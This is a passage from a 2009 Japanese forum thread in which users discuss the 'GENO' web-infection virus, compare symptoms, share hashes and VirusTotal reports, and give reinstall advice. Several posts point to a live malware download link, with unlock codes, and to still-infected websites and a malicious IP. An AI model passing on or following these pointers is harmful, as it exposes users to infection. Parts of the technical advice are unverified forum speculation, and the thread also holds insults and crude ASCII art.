このウィルスって、
メモリ馬鹿食いさせて、メモリ上のアプリを落とす。
再起動した時にメモリ上のexeを乗っ取って悪さをする。
La.exeや8lv.exe自体はウィルス的な挙動を行わず、
あくまでもメモリ上で乗っ取ったWindowsのexeで
ウィルス的な挙動をさせるってことだよね?

だから大元のファイルを特定できず、アンチウィルスソフトも
右往左往してるってことで合ってる?

693 : ◆W07s5cWHb. :2009/04/09(木) 23:51:23
>>669
ちなみにちょっと思い出したけど、
確か食らったのはソフトウェア板のPerfectDiskスレの現行の一つ前のスレ内のリンクだったと思う。
ギコナビのログも採取出来なかったんで、レス番等の詳細も追えない。

で、ウィルスの挙動に関しては正直今回のGenoウィルスに結構似てて、
Regeditやメモ帳等Windows標準アプリがジャックされて起動不能になって
ProcessExplorerで確認しつつ、いじくるツールでレジストリの起動系キーを確認してる間に
Document and Settings内のファイルがジャンジャン消されてハング。
マイドキュメント内のデータが少なかった事が仇となった様で即効でハングした。

694 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:52:16
ウィルス本体よりも、むしろこれほどまでのウィルスを製作した奴がどんな人間なのか知りたい
まさか元Adobe社員のプログラマとかないだろうな

695 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:53:07
+から飛来したか

696 : ◆W07s5cWHb. :2009/04/09(木) 23:53:26
あ、あと、おいらが食らったウィルスはタスクマネージャーもジャックして起動出来なかったわ。

参考までに報告。

697 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:53:30
最強のウィルスってのは人知れずコソーリ活動するものじゃないのか?

698 :名無しさん@お腹いっぱい。:2009/04/10(金) 00:00:15
>>693
システム破壊系のウイルスなんて過去に腐るほどあるだろ・・・

699 :名無しさん@お腹いっぱい。:2009/04/10(金) 00:02:05
>>697
感染力が強くて被害がでかい割にコソーリ活動するのが最強だな
今回は感染力は普通だけど2ちゃんねらの短縮URL&GENOの対応の遅れで感染力が大幅アップ

700 :名無しさん@お腹いっぱい。:2009/04/10(金) 00:02:21
そもそもウイルスに最強とかないだろw


701 :名無しさん@お腹いっぱい。:2009/04/10(金) 00:02:46
むしろ最近キンタマ、オンゲの垢抜きとかいうように多様化しただけで
昔はウイルス=破壊というようなイメージしかなかった

702 :名無しさん@お腹いっぱい。:2009/04/10(金) 00:04:17
>>694
>>686
これがネタじゃなけりゃ神

703 :名無しさん@お腹いっぱい。:2009/04/10(金) 00:05:51
>>700
そういうのを格付けしたくなる年頃なんだろ

704 : ◆W07s5cWHb. :2009/04/10(金) 00:07:12
>>698
昔からある典型的なタイプだけど、恐らく一部バイナリ改変して
当時のノートン先生等をクリアしちゃう様にしてた物を踏んだんだと思う。

どうせ検出されるだろうと高をくくって踏んだら食らっちゃいましたってお話。
ノートン先生を過信しすぎてたw

705 :名無しさん@お腹いっぱい。:2009/04/10(金) 00:09:39
>>702
普通にクラッカーってどこで知識つけるか知りたいんだが

706 :名無しさん@お腹いっぱい。:2009/04/10(金) 00:11:23
>>705
子供は早く寝ようね

707 :名無しさん@お腹いっぱい。:2009/04/10(金) 00:12:21
>>705
ネットワーク板
ホームページをハッキングする方法
http://pc11.2ch.net/test/read.cgi/hack/1237392161/


708 : ◆W07s5cWHb. :2009/04/10(金) 00:12:48
>>705
ナビスコのオレオを沢山食べると腕が上がるって言ってたよw

709 :名無しさん@お腹いっぱい。:2009/04/10(金) 00:13:27
ニコ動で動画再生するとCPU使用率が
50前後ぐらいいくんだけど元々、そんなもんかねぇ

710 :名無しさん@お腹いっぱい。:2009/04/10(金) 00:13:46
性質の悪いウイルスなら知ってるけど最強のウイルスはしらない

711 :名無しさん@お腹いっぱい。:2009/04/10(金) 00:13:50
(* >ω<)=3プー

712 :名無しさん@お腹いっぱい。:2009/04/10(金) 00:25:49
>>709
皆は君のCPUが何か知らないからエスパーに聞くといい。

713 :名無しさん@お腹いっぱい。:2009/04/10(金) 00:28:39
>>712
dualcoreの2Gです

714 :709:2009/04/10(金) 00:33:30
>>713
>>709は私だ(* >ω<)=3プー

>>712
あぁ、やっぱりそうですよね、すみません

x86 Family 15 Model 79 Stepping 1 AuthenticAMD ~2204 Mhz
これがCPUでしょうか?

合計物理メモリってのが 1,024,00MB
利用可能な物理メモリが354,19MB
合計仮想メモリ 2,00GB

こんな感じです
Readerは7系の最新だったけどflashが10.0.10〜ぐらいで最新でなく
楽天系のブログ見てて記事押しても
表示されない変なブログがあったのが気がかり
ハッシュは>>84と一緒なんですけど

715 :名無しさん@お腹いっぱい。:2009/04/10(金) 00:38:28
>>714
flashについては>>499

716 :名無しさん@お腹いっぱい。:2009/04/10(金) 00:39:25
・・・・

717 :名無しさん@お腹いっぱい。:2009/04/10(金) 00:44:05
OS再インスコしとけ(* >ω<)=3プー

718 :名無しさん@お腹いっぱい。:2009/04/10(金) 00:46:54
( *   > ω < ) = 3 フ ゚ ー 

719 :615:2009/04/10(金) 00:51:12
>>715
flashのバージョンおぼえてないけど
なんか助かってる気もするけど・・・大丈夫と断定できないのがかなし。

インスコ・・・面倒やなぁ

720 : ◆W07s5cWHb. :2009/04/10(金) 00:52:35
思い出した。ウィルス報告があったから
敢えて試しに下のを踏んで食らったんだったわw

【最適化】PerfectDisk Part11【デフラグ】
http://pc12.2ch.net/test/read.cgi/software/1235509378/7

ここのレスの下のリンクを踏んで食らった。
もうファイル消されていると思うけど、踏むなら自己責任で最悪再インスコを覚悟してね。
hxxp://www.btfree.info/file.php?action-get.html

721 :615:2009/04/10(金) 00:54:52
もしも GENOウイルスが感染してるとして
問題なのはCドライブだけですかね?
パーティションきってるんですが他のドライブは・・

再インスコしたかたはどうしてますか?

722 :名無しさん@お腹いっぱい。:2009/04/10(金) 01:02:03
関係ないけど私のDELLもパーティションきってあるけど
DELL自体のシステム専用みたいなパーティションとかあって
素人だし意味がわかんないからサポに送ったよー
すっからかんになるみたいw


723 : ◆W07s5cWHb. :2009/04/10(金) 01:27:28
>>721
あくまで一般論でしか言えないけど、可能であれば当然全部フォーマットしなおすべきだし、
可能であればパーティションも再度切りなおすべき。
また、RAIDを組んでてストライピングやミラーリングを行っている場合は
パーティションを切りなおす以前にRAIDボリュームまで新たに組みなおすべき。

基本的にBIOSから認識される順で、1台目のHDDにマスターブートレコードが保存されているんだけど
その部分にも感染するウィルスの場合だと本当に厄介で、
原則的にはパーティションから切りなおして全てのドライブをフォーマットする感じになる。

今の所判ってる範囲ではこのGenoウィルスはそこまでしないウィルスだとは思うし、
単純にXPのシステム復元から復帰出来た人もいる様なので、そこまで気にしなくても大丈夫だとは思うけどね。

それに最近はUSBメモリの普通のブートレコードにも感染するウィルスとか、色々ある位なんで、
本来、原理原則に則って完璧に対処するのであれば、2台目等の複数のHDDを搭載している場合も
可能な限り一通りパーティションを切りなおす所から始めたほうが良いかと。
基本的にパーティションを切りなおす事で正しいブートレコードに書き換えられるんで。

ただ、実際にはどうしても消せない秘蔵エロ動画等のデータがDドライブにある等、止むを得ない場合は
キーロガー等が最悪残ってしまう等のリスクを承知の上で
Cドライブだけをフォーマットする形でお茶を濁すのもアリかと。

その上でXPやVistaを再インストールが完了した後に最新定義ファイルに更新したアンチウィルスソフトで
フルスキャンしてウィルスの残留の有無をチェックしたりして。

ぶっちゃけ、一度それで試して駄目ならその時にもう一度再セットアップを行って全部のドライブを消せばよいんだし。
二度手間になる可能性はあるけどね。

724 :名無しさん@お腹いっぱい。:2009/04/10(金) 01:28:55
悔しいですっ!!

725 :名無しさん@お腹いっぱい。:2009/04/10(金) 01:30:55
なげえ
2-4パラグラフは蛇足だな

726 : ◆W07s5cWHb. :2009/04/10(金) 01:35:39
うんうんw

酔ってるから無駄に長文で無駄に駄文になってるわw

727 :名無しさん@お腹いっぱい。:2009/04/10(金) 01:38:54
誰か>>723をデフラグしてきて

728 :名無しさん@お腹いっぱい。:2009/04/10(金) 01:40:09
>>727
不良セクタがあるから無理

729 :名無しさん@お腹いっぱい。:2009/04/10(金) 01:41:04
>>720
サンクス
けどパスが分からん


http://www.btfree.info/file.php?action-get.html
Code by:c418478c216f027

ちなみにリンク先は普通のダウンロードサイト

730 : ◆W07s5cWHb. :2009/04/10(金) 01:41:04
>>727
うちはSSDを使ってるからデフラグは無理w

731 :名無しさん@お腹いっぱい。:2009/04/10(金) 01:42:26
>>730
それも効果あるって話だが

732 :名無しさん@お腹いっぱい。:2009/04/10(金) 01:42:57
>728

じゃあローレベルフォーマットで

733 : ◆W07s5cWHb. :2009/04/10(金) 01:44:05
>>729
うちは確かレスに書かれてた記載コードを入れて食らった。
多分、コードを書き換えられたりしてて開けられないのかも知れないな。

734 :名無しさん@お腹いっぱい。:2009/04/10(金) 01:44:37
GENOウイルスが人体に与える影響も解析したほうがいいな

735 :名無しさん@お腹いっぱい。:2009/04/10(金) 01:46:26
>>733
zipの解凍パスだで?

736 : ◆W07s5cWHb. :2009/04/10(金) 01:50:12
>>731
実は何回かSSDにもデフラグ行ってるw

ただ、自作PC板のSSDスレ等で半分誤って書かれているのは
既存のデフラグソフトとは違って、
SSDの内部的に配置までちゃんと書き換えてくれる、
いわばSSD対応デフラグみたいな奴じゃないと殆ど意味無いんですよ。

SSDはHDDと違って、コントローラーがテキトーに割り振って
OSや通常のデフラグソフト上から見える位置とは全然異なる部分にデータを書き込んでるんで、
テキトーなコントローラーに騙されない
賢いデフラグソフトじゃないとSSDでは無意味なの。

737 : ◆W07s5cWHb. :2009/04/10(金) 01:52:59
>>735
多分想像付いてると思うけど、食らった時も酔ってたんだよw

で、確かパスを入れたらその時点で食らった筈なんだよね。
ZIPの解凍はしないでウィルスを食らった筈。

738 :名無しさん@お腹いっぱい。:2009/04/10(金) 01:53:50
>>736
誰かさんの逃避ダイアリーに書いてあったな

739 :名無しさん@お腹いっぱい。:2009/04/10(金) 01:55:37 ?2BP(0)
>>737
んなはずあるかよwwwww
ちゃんとヘッダはPKだっつーのwww

740 : ◆W07s5cWHb. :2009/04/10(金) 01:59:02
>>735
今恐る恐る踏んでZIPを落としたけどなんか感染した当時と異なってる感じだな。
今はなんかZIP中のKEYGEN.EXEにパスが掛かってるけど、そもそもあんなんじゃなかった筈。
ZIP自体がリプレースされているのかも。

741 :名無しさん@お腹いっぱい。:2009/04/10(金) 02:01:44
ああ、クリーンインストール終わって
やっと復帰したと思ったら今度はPCIDevice認識しないだRealTEKのオンボード
音源から音が出ないやらで大変です。パソ工のBTOパソコンは再インストール時に
音源を殺す設定がついているのでしょうかね。

742 : ◆W07s5cWHb. :2009/04/10(金) 02:03:24
ちなみに>>729のZIPもノートン先生無反応だな。
念のため扱いには十分注意してね。

743 :名無しさん@お腹いっぱい。:2009/04/10(金) 02:06:56
>>740
これと間違ってね?
http://www.btfree.info/file.php?action-get.html
Code by: d5ddf2d3204c8f4

>>729はウイルスじゃないぞw

744 : ◆W07s5cWHb. :2009/04/10(金) 02:08:43
>>741
流石にそこまではこのスレでは本来フォロー出来ない事だけど、酔って気分が良いから特別に。
↓の蟹さん謹製のドライバでも駄目なの?

ttp://www.realtek.com.tw/downloads/downloadsCheck.aspx?Langid=4&PNid=24&PFid=24&Level=4&Conn=3&DownTypeID=3&GetDown=false


>>743
あ、そうかもw

745 :名無しさん@お腹いっぱい。:2009/04/10(金) 02:09:15 ?2BP(0)
>>743
ちょ
パスマジ気になるから解凍できたのなら教えて

746 :名無しさん@お腹いっぱい。:2009/04/10(金) 02:10:11
>>721
もし問題がおきてから、C→他のドライブにファイルの移動とか
やってたらそのファイルに感染がある場合、広がる可能性もあるんじゃない?
基本パーティション切ってんなら、隔絶した空間だよな?(間違ってるかこの認識?)

747 :名無しさん@お腹いっぱい。:2009/04/10(金) 02:12:21
>>745
釣りかw

つPika Zip

748 :746:2009/04/10(金) 02:14:08
あ、上で詳しい解説あったか
失礼

749 : ◆W07s5cWHb. :2009/04/10(金) 02:15:06
>>746
最悪、傷口を広げて元の木阿弥になる可能性もあるよ。

だから完全にパーティションレベルから切り直してやらない限り
キーロガー等が残存しちゃう可能性はゼロではないの。


750 :名無しさん@お腹いっぱい。:2009/04/10(金) 02:15:20 ?2BP(0)
>>747
pikazipめんどい!
5桁で出なかったから投げた

751 :名無しさん@お腹いっぱい。:2009/04/10(金) 02:18:56 ?2BP(0)
ちょwwwww数字とかwwwww

752 :名無しさん@お腹いっぱい。:2009/04/10(金) 02:21:27
とりあえずバックアップしたいんなら
感染が疑われるドライブ or パーティションからシステムを起動させるのを避けて
別のドライブ or パーティションからOS立ち上げて作業したほうが無難

753 :名無しさん@お腹いっぱい。:2009/04/10(金) 02:23:09 ?2BP(0)
酔っぱらっるって
Pikazipが使えてなんでどう考えてもkeygenっぽくない(コンソールアプリっぽい)ファイル開いちまうんだよwww
ちなみにばっちりウイルスでした

754 :名無しさん@お腹いっぱい。:2009/04/10(金) 02:23:33
おやすみ 大体出尽くした感じだね
またなんかあったら繰る歯

755 :名無しさん@お腹いっぱい。:2009/04/10(金) 02:26:23
>>749
なるほど
参考になった
さんくす

756 : ◆W07s5cWHb. :2009/04/10(金) 02:27:56
>>752
だね。

てか、複数台のPCがある奴なら別のPCでアンチウィルスソフトのレスキューブートCD等をこしらえて、
再起動前にそいつでCD起動してブートセクタから何から一切合財スキャンしてチェックするのが望ましいね。

757 : ◆W07s5cWHb. :2009/04/10(金) 02:32:28
>>753
うちの環境だとPikaZipは入れてなくてLhaplusでしかパス解析出来ないけど、
そもそも酔ってるのに一々そんな事までして食らう訳ないだろw

ほぼワンクリックで食らったんだってのw

>>754
おやすも。

758 :名無しさん@お腹いっぱい。:2009/04/10(金) 07:47:50
俺おそらく感染してるんだけどsqlsodbc.chmはMD5:f639afde02547603a3d3930ee4bf8c12だった
svchostは5個中2個がNETWORKSERVICEでうごいてる
ちなみにカスペルスキーのオンラインスキャンのアップデートが途中でエラーでてできない

759 :名無しさん@お腹いっぱい。:2009/04/10(金) 07:51:25
判定の仕方がいまだにあいまいなのは非常に困った

760 :名無しさん@お腹いっぱい。:2009/04/10(金) 08:02:00
◆W07s5cWHb. が、いろんなレスしてる俺カッコいい!!
こんな事も知ってる俺すごい!と自己陶酔してるのがきもいネ!

761 :名無しさん@お腹いっぱい。:2009/04/10(金) 08:04:53
妬み

762 :名無しさん@お腹いっぱい。:2009/04/10(金) 08:14:45
>>757
そろそろ巣に帰れば?

763 :名無しさん@お腹いっぱい。:2009/04/10(金) 08:17:40
でも何一つ解決してないよ

764 :名無しさん@お腹いっぱい。:2009/04/10(金) 08:22:31
>>763
問題を解決する上で自称ニュー速民は必要かね?w

765 :615:2009/04/10(金) 08:26:10
>>723
d
週末インスコやります。

766 :名無しさん@お腹いっぱい。:2009/04/10(金) 08:27:04
問題のjsファイルも殆ど対応したし
あらゆるプロセスを乗っ取ることもわかったしこれ以上なにをしろと

767 :名無しさん@お腹いっぱい。:2009/04/10(金) 08:27:59
感染判定の確定情報ってある?

768 :名無しさん@お腹いっぱい。:2009/04/10(金) 08:31:27
>>758
オンラインスキャンがハングで落ちるわけでないならそのハッシュは正常なので感染を何らかの理由で防いでるのかも

769 :名無しさん@お腹いっぱい。:2009/04/10(金) 08:49:43
>>191
>以下のサイト(有名な駆除ツール)にアクセスできなければ危険

これってexeが落ちてきたら安心なのかな?

sqlsodbc.chmのMD5は先に確認したけど。

770 :名無しさん@お腹いっぱい。:2009/04/10(金) 08:52:34
>>758
> ちなみにカスペルスキーのオンラインスキャンのアップデートが途中でエラーでてできない
俺も同じく、途中でエラー。
そこで、カスペルスキースキャンエンジンを採用している、niftyオンラインスキャンに移動、
ここでは問題なかった。

771 :名無しさん@お腹いっぱい。:2009/04/10(金) 08:53:50
http://pagead2.googlesyndication.com/pagead/imgad?id=CPeky5TGr_CS2wEQ0AIYjQIyCIp5TM0PfxBd

772 :名無しさん@お腹いっぱい。:2009/04/10(金) 09:06:27
【0.1】ネットショップ「GENO」等でウイルス感染 業務再開するもGENOサイドは「キャッシュ消せ」とふざけた対応★11
http://tsushima.2ch.net/test/read.cgi/news/1239241638/209

209 名前: 雪割草ユキワリソウ(香川県)[sage] 投稿日:2009/04/09(木) 18:25:27.33 ID:Dyr5cr7f
楽天のショップ何個か感染しておりますな


↑これの真偽はどんなもんでしょ?

773 :156:2009/04/10(金) 10:23:45
>>667
こっちはreaderも何も変な動きが無い
CPUは0~2%くらいだしメモリも600M程度

774 :名無しさん@お腹いっぱい。:2009/04/10(金) 10:26:16
>>598
直リンすんなキモブタ

775 :156:2009/04/10(金) 10:30:26
あ、そういや俺もカスペルスキーオンラインスキャンが出来ないわ

776 :名無しさん@お腹いっぱい。:2009/04/10(金) 10:33:20
msとアンチウイルスサイトに繋がりません
かんせんですか?

777 :名無しさん@お腹いっぱい。:2009/04/10(金) 10:36:45
>>776
このウイルスは特定サイトに繋がらないんじゃなくて、
極端に繋がりにくくなるだけ。

何度も何度も試せば繋がるよ。

778 :名無しさん@お腹いっぱい。:2009/04/10(金) 10:44:43
まったく駄目です
あとイーモバイルで接続すると凄いポートスキャンでCPU使用率100パーになります

779 :名無しさん@お腹いっぱい。:2009/04/10(金) 10:47:26
てst

780 :名無しさん@お腹いっぱい。:2009/04/10(金) 10:51:47
>>772
正確には感染していた、の方が正しいんじゃない?
www.rakuten.ne.jp/gold/i-na/が感染してたと話題が上がってて今は何事もなかったように営業してるし、
慌てて楽天がなんらかの処置を施したのかと
楽天のサーバーがハッキングされたとして他の店も同時多発的にやられてたとしても不思議じゃないよ

781 :名無しさん@お腹いっぱい。:2009/04/10(金) 10:54:24
各サイトが対策を施すのは待つしかないとして・・・
ウィルス対策ソフトメーカーの対応状況はどうなってるか誰か教えて。


782 :名無しさん@お腹いっぱい。:2009/04/10(金) 11:00:49
土曜のウィルス報告が上がる前にIE/firefox/chromeで突撃してすべて落ちたけど無害ですんだ
XPhomeのavast常駐でreaderが9.0.0だった

783 :名無しさん@お腹いっぱい。:2009/04/10(金) 11:13:09
>>770サンクス!
niftyのオンラインスキャンできた
感染は0だったけどロックされてますってのが実に怪しいw

784 :名無しさん@お腹いっぱい。:2009/04/10(金) 11:26:52
>>780
デスヨネー
ただ他の店舗でも発生してればもうちょっと情報出てくるよね。

どうもSQLインジェクションとかではなくて
FTPのパスワードを抜かれたか簡単過ぎて推測されただけのような希ガス

785 :名無しさん@お腹いっぱい。:2009/04/10(金) 11:27:53
crestronjapan.com 、対策されてるっぽくね?
既出?

786 :名無しさん@お腹いっぱい。:2009/04/10(金) 11:35:49
まだ残ってる

787 :名無しさん@お腹いっぱい。:2009/04/10(金) 11:36:01
無能な鯖管は消えろ!

788 :名無しさん@お腹いっぱい。:2009/04/10(金) 11:46:23
アヴァイラが親玉と思われるをファイル解析後、個人情報を盗むPSW系のトロイという結果がでてるな
カスペじゃ無害と言われたのに
リネームしてもう一回提出してみる

大きな進展w

789 :名無しさん@お腹いっぱい。:2009/04/10(金) 11:55:06
>>786
まじ? URLどこ?

790 :名無しさん@お腹いっぱい。:2009/04/10(金) 11:55:58
>>786
ごめんソースにまんま残ってたわw

NoScriptのメニューだけで判断してた('A`)

791 :名無しさん@お腹いっぱい。:2009/04/10(金) 11:56:02
>>789 トップページ
www.crestronjapan●com/

792 :名無しさん@お腹いっぱい。:2009/04/10(金) 12:01:54
まだ残ってる
ラトビアに飛ばされた

793 :名無しさん@お腹いっぱい。:2009/04/10(金) 12:03:54
逆アセンブルとか言ってる痛い子がちらほらと

794 :名無しさん@お腹いっぱい。:2009/04/10(金) 12:04:13
まだ気付いてないのかな?
連絡してあげたいが、PC素人だから無理ぽ('A`)

795 :名無しさん@お腹いっぱい。:2009/04/10(金) 12:07:32
>>794
クレストロンジャパンへは報告済みだよ。
向こうが対処してないだけ。

796 :名無しさん@お腹いっぱい。:2009/04/10(金) 12:08:58
変造jquery.js
ttp://www.virustotal.com/jp/analisis/638f74f6add00d943690e13a4ca8a397
変造PDF(id=2で落ちてくるもの)
ttp://www.virustotal.com/jp/analisis/6d7595324ab9c58757cf774ae88c6a98
ttp://www.virustotal.com/jp/analisis/265f9b488b37b132a6f980fc83339bd7
変造SWF(id=3で落ちてくるもの)
ttp://www.virustotal.com/jp/analisis/6020c97f34eb26ca4ad923b8ff2dc52f
exe(id=10で落ちてくるもの)
ttp://www.virustotal.com/analisis/48cfd289b06a1fb46dfbcb9fc8bad17a (現物がないため古い結果)
ttp://www.virustotal.com/jp/analisis/7aabab7fb0aa74ddf685b72c7f4fa490
ttp://www.virustotal.com/jp/analisis/1f8a1593c5be38312b7d19ddb7a3ef34

797 :792:2009/04/10(金) 12:09:21
11:59:08のログから
ZoneAlarm Security Suite は、あなたのコンピュータから
リモート コンピュータ: IP アドレス 94.247.2.195、ポート 80 への通信をブロックしました。
この警告は、ZoneAlarm Security Suite が完全に開始する前にプログラムがインターネットへの
接続をすると発生することがあります。

798 :名無しさん@お腹いっぱい。:2009/04/10(金) 12:09:45
>>795
そうなんだ、すごい会社だね

799 :名無しさん@お腹いっぱい。:2009/04/10(金) 12:13:32
>>798
すげーのはてめーの頭の構造だよ
糞虫湧いてるくせに調子に乗るな

800 :名無しさん@お腹いっぱい。:2009/04/10(金) 12:14:06
会社によっては自社ホームページをスタートページに設定しているところもあるだろうに
この社内ではウイルスが蔓延していないのか?

801 :名無しさん@お腹いっぱい。:2009/04/10(金) 12:18:00
xp使用、旧tepco光、バッファローの有線ルータ

ポート445無効にしたらネット接続出来なくなったため
元に戻したいのですが、どれを選べばいいでしょうか。
システムとか要求とか自動とかあるので
無効以外でこれにしとけというのはありますでしょうか


802 :名無しさん@お腹いっぱい。:2009/04/10(金) 12:19:41
>>799


803 :名無しさん@お腹いっぱい。:2009/04/10(金) 12:23:01
ポッポー (´ \  | __________/ヽ       /
         .l l \| | !ノートン先生 ! //U ヽ___/
パソコン蛾人  \ !!大激怒!! //   U    :::U:
ぶっ壊れ(__)   \ !!!!! / // ___   \  :::
たお! (__)    \∧∧∧∧/   |  |   |    U ::::
     (`Д´#)   < ぶ パ >   |U |   |     ::U:
   _| ̄ ̄||_)_ <  っ ソ >    | ├―-┤ U.....::::
 /旦|――||// /| < 壊 コ >    ヽ     .....:::::::::
─────────< れ ン >──────────
<   _,ノ , 、ヽ、_ ノ< た 蛾>  プスプスプス・・・・・∬∬
 (y○')`ヽ) ( ´(y○')<  !!!   >踏んじゃったよぉ___
  ⌒ /    ヽ⌒ /∨∨∨∨\   ∧_∧  ||\
うわあ |~ ̄ ̄~.|ぁぁ/パソコン蛾ぶ \ ( ;´Д`)  || |
ぁぁ| |||! i: |||! !|ぁ/っ壊れた!ディス \(  つ/ ̄||/
ぁぁ| |||| !! !!||| :|/プレイが砕け散った! \ヽ |二二二」


804 :名無しさん@お腹いっぱい。:2009/04/10(金) 12:23:37

   _,,....,,_  _人人人人人人人人人人人人人人人_
-''":::::::::::::`''> ゆっくり オマンコ みていってね!! <
ヽ::::::::::::::::::::: ̄^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^ ̄
 |::::::;ノ´ ̄\:::::::::::\_,. -‐ァ     __   _____   ______
 |::::ノ   ヽ、ヽr-r'"´  (.__    ,´ _,, '-´ ̄ ̄`-ゝ 、_ イ、
_,.!イ_  _,.ヘーァ'二ハ二ヽ、へ,_7   'r ´          ヽ、ン、
::::::rー''7コ-‐'"´    ;  ', `ヽ/`7 ,'==─-      -─==', i
r-'ァ'"´/  /! ハ  ハ  !  iヾ_ノ i イ iゝ、イ人レ/_ルヽイ i |
!イ´ ,' | /__,.!/ V 、!__ハ  ,' ,ゝ レリイi (ヒ_]     ヒ_ン ).| .|、i .||
`!  !/レi' (ヒ_]     ヒ_ン レ'i ノ   !Y!""  ,___,   "" 「 !ノ i |
,'  ノ   !'"    ,___,  "' i .レ'    L.',.   ヽ _ン    L」 ノ| .|
 (  ,ハ    ヽ _ン   人!      | ||ヽ、       ,イ| ||イ| / 
,.ヘ,)、  )>,、 _____, ,.イ  ハ    レ ル` ー--─ ´ルレ レ´

805 :名無しさん@お腹いっぱい。:2009/04/10(金) 12:24:00
>>780
www.rakuten.ne.jp/gold/以下は楽天の提供しているシステムじゃなくて
サーバ貸しに近い形態だったからまあ、なんつーか....
慌てて何か対処したかもわからんね


806 :名無しさん@お腹いっぱい。:2009/04/10(金) 12:25:28
>>799
糞虫以下

807 :名無しさん@お腹いっぱい。:2009/04/10(金) 12:41:17
だいぶ静かになった?

808 :名無しさん@お腹いっぱい。:2009/04/10(金) 12:43:54
>>799
なるほど、これがセキュ板に常駐する基地外ウイルスか

809 :名無しさん@お腹いっぱい。:2009/04/10(金) 12:47:24
>>808
この板は年中ウイルスが蔓延ってるぜ

810 :名無しさん@お腹いっぱい。:2009/04/10(金) 12:56:31
そんなに似てねーぞ

811 : ◆W07s5cWHb. :2009/04/10(金) 13:06:00
>>807
まだまだでしょ。

ただ、これ、アンチウィルスソフトが殆ど対応したから新たな被害者はあまり出ないと思うけど、
鯖側の感染数が減らないと、逆にブラクラ同然のサイトが増えるだけなんだよね。

管理者不在公開鯖がこれだけ多いと厳しいな。
未だになんのアクションもしないで放置している某者みたいなところ、結構多いと思うよ。

アフォしかいないから杜撰な管理→杜撰だからクラックされる→アフォだから対処不能→放置
この最悪コンボなんだよな。

本当なら行政処分しないといけないレベル。

812 :名無しさん@お腹いっぱい。:2009/04/10(金) 13:32:04
三日間も放置した挙句、キャッシュをクリアで
事を済まそうとする適当さが許せん。

813 :名無しさん@お腹いっぱい。:2009/04/10(金) 13:44:28
次スレはいらないから建てるなよ
そろそろ過疎ってくるしここIDでないから。
変なのも湧くしやるなら他でやれ

814 :名無しさん@お腹いっぱい。:2009/04/10(金) 13:46:46
>>813
おまえが来なきゃいいだけだろ
建てられると困ることでもあるのか?

815 :名無しさん@お腹いっぱい。:2009/04/10(金) 13:51:27
>>813
わかりました、もう次スレ用意しろって事ですね?

816 :名無しさん@お腹いっぱい。:2009/04/10(金) 13:53:52
 
関係ないけどHotmail.comがおかしくなってるな。

817 : ◆W07s5cWHb. :2009/04/10(金) 14:03:02
>>816
Hotmail終了のお知らせ
http://tsushima.2ch.net/test/read.cgi/news/1239338004/


818 :名無しさん@お腹いっぱい。:2009/04/10(金) 14:03:33
>>814
次スレ建てても消化出来ないだろ
ID出ないし荒れるだけ
馬鹿共死ねってことだよ
理解しろ

819 :名無しさん@お腹いっぱい。:2009/04/10(金) 14:05:13
なにこいつw

820 :名無しさん@お腹いっぱい。:2009/04/10(金) 14:05:54
まだ懲りないらしい

821 :名無しさん@お腹いっぱい。:2009/04/10(金) 14:06:06
うんこ

822 : ◆W07s5cWHb. :2009/04/10(金) 14:06:15
ただの基地外、もしくは工作員だって田宮さんが言ってた

823 :名無しさん@お腹いっぱい。:2009/04/10(金) 14:06:18
ですよねー

824 :名無しさん@お腹いっぱい。:2009/04/10(金) 14:06:59
変なとこにレスしてしまった

825 : ◆W07s5cWHb. :2009/04/10(金) 14:09:29
まぁ、これだけスレに常駐してる奴が居るんだから
火消ししても無駄だと思うよ。

多分、雑談スレ化しながら各Genoスレのヲチスレとなったり
新たに食らった痛いサイトを嘲笑うスレになると思うw

826 :名無しさん@お腹いっぱい。:2009/04/10(金) 14:12:00
このスレを見ているといかにセキュ板の住民が情報強者かわかる
ν速なんか情弱しかいないからなぁ
やっぱりみんなで守っていかないと駄目だな。
今のν速はw

827 :名無しさん@お腹いっぱい。:2009/04/10(金) 14:12:03
>>818
おまえが死ねば問題ないよ
消えろ

828 :名無しさん@お腹いっぱい。:2009/04/10(金) 14:14:46
しねとかいっちゃだめだよー
なかよくね

829 :名無しさん@お腹いっぱい。:2009/04/10(金) 14:15:14
GENOの営業が再開した月曜日から各地のGENOスレで
もういらないだろ的な書き込みを始めてるんでスルーしてあげてくれ

830 :名無しさん@お腹いっぱい。:2009/04/10(金) 14:20:46
マカフィーは対応してるの?
ウィルス名は何?



831 :名無しさん@お腹いっぱい。:2009/04/10(金) 14:22:03
>>817
サンクス。
なにか不具合でサイトが落ちてたみたい。
今アクセスしたら復旧してた。

832 :名無しさん@お腹いっぱい。:2009/04/10(金) 14:22:57
しかし想像以上にタチの悪いウイルスだな。


833 :名無しさん@お腹いっぱい。:2009/04/10(金) 14:35:37
3日の夜にGeno踏んで7日に知ったんだが、もらってんのかな?火狐2でflashもadbeも最新ではなかった。

sqlsodbc.chmはハッシュ改変なし。火狐もIEも落ちない。カスペルではnyとshareが不正なアドオンとでて、E-mailワームが1個でてそのファイルは削除。トロイは出なかった。コマンドプロントは7日にあけちゃったけど、まずかったのか。

気になるのが、火狐で見てて、何も開いたりしてないのに、1秒置きにCPU(セレM420)使用率が7〜100%間を行き来するんだけど。潜伏してて何かされてるって可能性ある?

834 :名無しさん@お腹いっぱい。:2009/04/10(金) 14:45:39
>>833
もう感染してるじゃないのか?

835 :156:2009/04/10(金) 14:46:32
たまにDEPでexproler.exeが落ちてシステムの復元も出来ない
オワタ?

836 :名無しさん@お腹いっぱい。:2009/04/10(金) 14:49:25
>>833,835
もうマジで、クリーンインストしたほうがいいと思うよ。

837 :名無しさん@お腹いっぱい。:2009/04/10(金) 14:50:46
>>835
発病してるw
うpでーとできる?
出来なきゃ当確

838 :名無しさん@お腹いっぱい。:2009/04/10(金) 14:55:28
割れ房はアップデートがそもそも出来ない件

839 :名無しさん@お腹いっぱい。:2009/04/10(金) 14:56:40
>>837
windowsアップデートならできる

840 : ◆W07s5cWHb. :2009/04/10(金) 14:56:48
>>835
それは多分ご愁傷様かとw
とっとと必要なデータをDVD-Rにでも焼いた後にクリーンインストールだな。

841 :名無しさん@お腹いっぱい。:2009/04/10(金) 14:59:09
フリーでDtoD、リカバリー領域をHDDに作成するツールないかな・・・
ドライバ、ソフト入れなおすの面倒なんだぜ

842 :名無しさん@お腹いっぱい。:2009/04/10(金) 15:02:18
>>839
